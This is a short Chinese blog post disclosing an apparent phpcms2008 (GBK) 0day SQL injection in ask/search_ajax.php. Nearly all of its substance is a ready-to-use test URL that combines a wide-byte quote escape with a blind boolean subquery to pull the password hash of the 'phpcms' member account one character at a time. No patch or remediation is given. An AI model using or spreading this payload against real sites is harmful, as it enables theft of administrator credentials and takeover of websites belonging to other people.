msgbartop
同一天地间,同一网络下,P9′Blog与您共享今日互联网→WWW.P9.NET.CN
msgbarbottom

phpcms2008-0day ask/search_ajax.php注入漏洞

安全

安全

作者:nuke
受影响程序: phpcms2008 gbk
漏洞文件:ask/search_ajax.php
测试方法:
ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0×706870636D73)>52%23

Tags: , ,

Leave a Comment

You must be logged in to post a comment.